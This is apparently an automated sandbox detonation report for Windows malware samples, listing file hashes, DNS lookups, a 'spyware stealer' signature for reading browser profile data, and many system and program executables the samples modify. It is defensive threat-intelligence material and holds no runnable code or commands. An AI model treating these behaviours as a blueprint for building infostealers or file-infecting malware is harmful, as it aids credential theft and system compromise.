C:\$MontanaRoblox\ForlornApi.dll

MD5 31f7684cd01d453008660da9e52f4030
SHA1 53f8165a98f4cb4d8b23bb9610389bac3d058595
SHA256 6c7c6ccd328826aee998c826e2666441224f7d158dfe71b2c3270b0dbf8970aa
SHA512 de512c844b4a76c27216082cefe76482e93d74dcf34e134bd7e3ff4bfc852d3e3b5acd24ce0cee2eadc943ad84471198f383a5cc83b03fb68e1b389057e01d47

memory/4752-127-0x000002CBE5AF0000-0x000002CBE5AF8000-memory.dmp

memory/4752-128-0x00007FFA8CFA0000-0x00007FFA8DA62000-memory.dmp

Analysis: behavioral27

Detonation Overview

Submitted

2024-12-02 16:10

Reported

2024-12-02 16:14

Platform

win10ltsc2021-20241023-en

Max time kernel

97s

Max time network

141s

Command Line

"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\stTfuo7I.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\tmpfile-main\stTfuo7I.exe

"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\stTfuo7I.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp

Files

memory/4408-0-0x00007FF640200000-0x00007FF640719000-memory.dmp

memory/4408-1-0x00007FF640200000-0x00007FF640719000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2024-12-02 16:10

Reported

2024-12-02 16:14

Platform

win10ltsc2021-20241023-en

Max time kernel

149s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Update.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System32\alg.exe N/A
N/A N/A C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe N/A
N/A N/A C:\Windows\system32\fxssvc.exe N/A
N/A N/A C:\Windows\System32\GameInputSvc.exe N/A
N/A N/A C:\Windows\System32\GameInputSvc.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe N/A
N/A N/A C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe N/A
N/A N/A C:\Windows\System32\msdtc.exe N/A
N/A N/A \??\c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE N/A
N/A N/A C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe N/A
N/A N/A C:\Windows\SysWow64\perfhost.exe N/A
N/A N/A C:\Windows\system32\locator.exe N/A
N/A N/A C:\Windows\System32\SensorDataService.exe N/A
N/A N/A C:\Windows\System32\snmptrap.exe N/A
N/A N/A C:\Windows\system32\spectrum.exe N/A
N/A N/A C:\Windows\System32\OpenSSH\ssh-agent.exe N/A
N/A N/A C:\Windows\system32\TieringEngineService.exe N/A
N/A N/A C:\Windows\system32\AgentService.exe N/A
N/A N/A C:\Windows\System32\vds.exe N/A
N/A N/A C:\Windows\system32\vssvc.exe N/A
N/A N/A C:\Windows\system32\wbengine.exe N/A
N/A N/A C:\Windows\system32\wbem\WmiApSrv.exe N/A
N/A N/A C:\Windows\system32\SearchIndexer.exe N/A
N/A N/A C:\Windows\System32\msdtc.exe N/A
N/A N/A C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe N/A
N/A N/A C:\Windows\system32\spectrum.exe N/A
N/A N/A C:\Windows\system32\SearchIndexer.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\AppVClient.exe C:\Windows\System32\snmptrap.exe N/A
File opened for modification C:\Windows\system32\msiexec.exe C:\Windows\System32\snmptrap.exe N/A
File opened for modification C:\Windows\System32\SensorDataService.exe C:\Windows\System32\snmptrap.exe N/A
File opened for modification C:\Windows\System32\alg.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Update.exe N/A
File opened for modification C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Update.exe N/A
File opened for modification C:\Windows\system32\dllhost.exe C:\Windows\system32\TieringEngineService.exe N/A
File opened for modification C:\Windows\system32\SgrmBroker.exe C:\Windows\System32\vds.exe N/A
File opened for modification C:\Windows\System32\snmptrap.exe C:\Windows\system32\wbem\WmiApSrv.exe N/A
File opened for modification C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe C:\Windows\System32\alg.exe N/A
File opened for modification C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe C:\Windows\system32\locator.exe N/A
File opened for modification C:\Windows\system32\AppVClient.exe C:\Windows\system32\TieringEngineService.exe N/A
File opened for modification C:\Windows\System32\vds.exe C:\Windows\system32\SearchIndexer.exe N/A
File opened for modification C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe C:\Windows\system32\wbengine.exe N/A
File opened for modification C:\Windows\System32\OpenSSH\ssh-agent.exe C:\Windows\system32\SearchIndexer.exe N/A
File opened for modification C:\Windows\system32\fxssvc.exe C:\Windows\System32\snmptrap.exe N/A
File opened for modification C:\Windows\system32\SgrmBroker.exe C:\Windows\system32\wbengine.exe N/A
File opened for modification C:\Windows\system32\SgrmBroker.exe C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe N/A
File opened for modification C:\Windows\System32\snmptrap.exe C:\Windows\system32\TieringEngineService.exe N/A
File opened for modification C:\Windows\System32\OpenSSH\ssh-agent.exe C:\Windows\System32\vds.exe N/A
File opened for modification C:\Windows\system32\AppVClient.exe C:\Windows\system32\SearchIndexer.exe N/A
File opened for modification C:\Windows\system32\msiexec.exe C:\Windows\system32\SearchIndexer.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\4f490c8b76bd8ed3.bin C:\Windows\System32\alg.exe N/A
File opened for modification C:\Windows\system32\SearchIndexer.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Update.exe N/A
File opened for modification C:\Windows\system32\msiexec.exe C:\Windows\system32\locator.exe N/A
File opened for modification C:\Windows\system32\fxssvc.exe C:\Windows\system32\spectrum.exe N/A
File opened for modification C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe C:\Windows\system32\TieringEngineService.exe N/A
File opened for modification C:\Windows\system32\fxssvc.exe C:\Windows\System32\msdtc.exe N/A
File opened for modification C:\Windows\system32\AgentService.exe \??\c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE N/A
File opened for modification C:\Windows\system32\dllhost.exe \??\c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE N/A
File opened for modification C:\Windows\system32\AppVClient.exe C:\Windows\system32\locator.exe N/A
File opened for modification C:\Windows\system32\dllhost.exe C:\Windows\system32\spectrum.exe N/A
File opened for modification C:\Windows\system32\SgrmBroker.exe C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe N/A
File opened for modification C:\Windows\system32\AgentService.exe C:\Windows\System32\msdtc.exe N/A
File opened for modification C:\Windows\System32\msdtc.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe N/A
File opened for modification C:\Windows\system32\fxssvc.exe C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe N/A
File opened for modification C:\Windows\system32\msiexec.exe C:\Windows\System32\msdtc.exe N/A
File opened for modification C:\Windows\system32\SgrmBroker.exe C:\Windows\System32\alg.exe N/A
File opened for modification C:\Windows\system32\SgrmBroker.exe C:\Windows\System32\msdtc.exe N/A
File opened for modification C:\Windows\system32\dllhost.exe C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe N/A
File opened for modification C:\Windows\System32\SensorDataService.exe C:\Windows\System32\msdtc.exe N/A
File opened for modification C:\Windows\system32\AgentService.exe C:\Windows\system32\vssvc.exe N/A
File opened for modification C:\Windows\System32\SensorDataService.exe C:\Windows\system32\SearchIndexer.exe N/A
File opened for modification C:\Windows\system32\wbem\WmiApSrv.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Update.exe N/A
File opened for modification C:\Windows\system32\TieringEngineService.exe C:\Windows\system32\SearchIndexer.exe N/A
File opened for modification C:\Windows\system32\SgrmBroker.exe C:\Windows\System32\msdtc.exe N/A
File opened for modification C:\Windows\system32\AgentService.exe C:\Windows\System32\alg.exe N/A
File opened for modification C:\Windows\system32\locator.exe C:\Windows\system32\wbengine.exe N/A
File opened for modification C:\Windows\System32\vds.exe C:\Windows\System32\alg.exe N/A
File opened for modification C:\Windows\system32\AppVClient.exe C:\Windows\system32\spectrum.exe N/A
File opened for modification C:\Windows\system32\AgentService.exe C:\Windows\system32\wbengine.exe N/A
File opened for modification C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe C:\Windows\system32\vssvc.exe N/A
File opened for modification C:\Windows\system32\fxssvc.exe C:\Windows\System32\vds.exe N/A
File opened for modification C:\Windows\System32\OpenSSH\ssh-agent.exe C:\Windows\System32\msdtc.exe N/A
File opened for modification C:\Windows\system32\SearchIndexer.exe C:\Windows\System32\msdtc.exe N/A
File opened for modification C:\Windows\System32\SensorDataService.exe C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe N/A
File opened for modification C:\Windows\system32\dllhost.exe C:\Windows\System32\msdtc.exe N/A
File opened for modification C:\Windows\system32\AgentService.exe C:\Windows\system32\locator.exe N/A
File opened for modification C:\Windows\system32\dllhost.exe C:\Windows\System32\snmptrap.exe N/A
File opened for modification C:\Windows\system32\AppVClient.exe \??\c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE N/A
File opened for modification C:\Windows\System32\SensorDataService.exe C:\Windows\system32\wbengine.exe N/A
File opened for modification C:\Windows\system32\dllhost.exe C:\Windows\system32\locator.exe N/A
File opened for modification C:\Windows\system32\AppVClient.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe N/A
File opened for modification C:\Windows\system32\msiexec.exe C:\Windows\system32\spectrum.exe N/A
File opened for modification C:\Windows\system32\dllhost.exe C:\Windows\system32\wbem\WmiApSrv.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Mozilla Firefox\default-browser-agent.exe C:\Windows\System32\snmptrap.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\orbd.exe C:\Windows\system32\TieringEngineService.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jabswitch.exe C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\policytool.exe C:\Windows\System32\msdtc.exe N/A
File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateCore.exe C:\Windows\System32\msdtc.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\schemagen.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\jabswitch.exe C:\Windows\System32\msdtc.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\mip.exe C:\Windows\System32\vds.exe N/A
File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateBroker.exe C:\Windows\system32\SearchIndexer.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\java-rmi.exe C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe N/A
File opened for modification C:\Program Files\7-Zip\7zG.exe C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe N/A
File opened for modification C:\Program Files (x86)\Google\Update\DisabledGoogleUpdate.exe C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe C:\Windows\system32\spectrum.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe C:\Windows\system32\spectrum.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\jabswitch.exe C:\Windows\system32\TieringEngineService.exe N/A
File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateCore.exe C:\Windows\system32\TieringEngineService.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\javapackager.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Update.exe N/A
File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateBroker.exe C:\Windows\System32\alg.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe \??\c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE N/A
File opened for modification C:\Program Files (x86)\Internet Explorer\ielowutil.exe C:\Windows\System32\snmptrap.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jarsigner.exe C:\Windows\System32\msdtc.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\system32\locator.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe C:\Windows\system32\spectrum.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jsadebugd.exe C:\Windows\System32\vds.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jconsole.exe C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\klist.exe C:\Windows\System32\msdtc.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe C:\Windows\System32\msdtc.exe N/A
File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\ktab.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\notification_helper.exe C:\Windows\system32\wbem\WmiApSrv.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\kinit.exe C:\Windows\System32\msdtc.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\keytool.exe C:\Windows\System32\alg.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\kinit.exe C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\servertool.exe C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\updater.exe C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe N/A
File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe C:\Windows\system32\spectrum.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\keytool.exe C:\Windows\System32\vds.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\rmic.exe C:\Windows\system32\wbem\WmiApSrv.exe N/A
File opened for modification C:\Program Files\Internet Explorer\iediagcmd.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Update.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\chrome_proxy.exe C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\tnameserv.exe C:\Windows\system32\locator.exe N/A
File opened for modification C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Windows\system32\locator.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\rmic.exe C:\Windows\System32\msdtc.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\javaws.exe C:\Windows\System32\snmptrap.exe N/A
File opened for modification C:\Program Files\Internet Explorer\iexplore.exe C:\Windows\System32\OpenSSH\ssh-agent.exe N/A
File opened for modification C:\Program Files\dotnet\dotnet.exe C:\Windows\System32\vds.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\javaws.exe C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\jabswitch.exe C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\pack200.exe C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\unpack200.exe C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\ktab.exe C:\Windows\system32\SearchIndexer.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\uninstall.exe C:\Windows\system32\locator.exe N/A
File opened for modification C:\Program Files\Windows Defender\NisSrv.exe C:\Windows\System32\snmptrap.exe N/A
File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleCrashHandler64.exe C:\Windows\System32\snmptrap.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe C:\Windows\system32\spectrum.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\policytool.exe C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Oracle\Java\javapath\javaws.exe C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\orbd.exe \??\c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\javac.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\chrmstp.exe C:\Windows\System32\vds.exe N/A
File opened for modification C:\Program Files\Internet Explorer\ieinstal.exe C:\Windows\system32\SearchIndexer.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\kinit.exe C:\Windows\system32\SearchIndexer.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\jjs.exe C:\Windows\system32\spectrum.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe C:\Windows\System32\alg.exe N/A
File opened for modification C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe N/A
File opened for modification C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe N/A
File opened for modification C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe N/A
File opened for modification C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe C:\Windows\system32\wbem\WmiApSrv.exe N/A
File opened for modification C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe C:\Windows\System32\msdtc.exe N/A
File opened for modification C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe C:\Windows\System32\OpenSSH\ssh-agent.exe N/A
File opened for modification C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe C:\Windows\System32\vds.exe N/A
File opened for modification C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe C:\Windows\system32\wbengine.exe N/A
File opened for modification C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe C:\Windows\system32\SearchIndexer.exe N/A
File opened for modification C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Update.exe N/A
File opened for modification C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe \??\c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE N/A
File opened for modification C:\Windows\DtcInstall.log C:\Windows\System32\msdtc.exe N/A
File opened for modification C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe C:\Windows\system32\locator.exe N/A
File opened for modification C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe C:\Windows\system32\spectrum.exe N/A
File opened for modification C:\Windows\DtcInstall.log C:\Windows\System32\msdtc.exe N/A
File opened for modification C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe N/A
File opened for modification C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe C:\Windows\System32\snmptrap.exe N/A
File opened for modification C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe C:\Windows\system32\TieringEngineService.exe N/A
File opened for modification C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe C:\Windows\system32\vssvc.exe N/A
File opened for modification C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe C:\Windows\System32\msdtc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\System32\SensorDataService.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\System32\SensorDataService.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A C:\Windows\System32\SensorDataService.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\System32\SensorDataService.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\Windows\System32\SensorDataService.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A C:\Windows\System32\SensorDataService.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\System32\SensorDataService.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\System32\SensorDataService.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 C:\Windows\System32\SensorDataService.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\System32\SensorDataService.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\UpperFilters C:\Windows\System32\GameInputSvc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 C:\Windows\System32\SensorDataService.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\System32\SensorDataService.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\System32\SensorDataService.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName C:\Windows\System32\SensorDataService.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\System32\SensorDataService.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\System32\SensorDataService.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\System32\SensorDataService.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\System32\GameInputSvc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\System32\GameInputSvc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 C:\Windows\System32\SensorDataService.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\System32\SensorDataService.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\System32\SensorDataService.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 C:\Windows\System32\SensorDataService.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\System32\SensorDataService.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\System32\SensorDataService.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 C:\Windows\System32\SensorDataService.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A C:\Windows\System32\SensorDataService.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\UpperFilters C:\Windows\System32\GameInputSvc.exe N/A
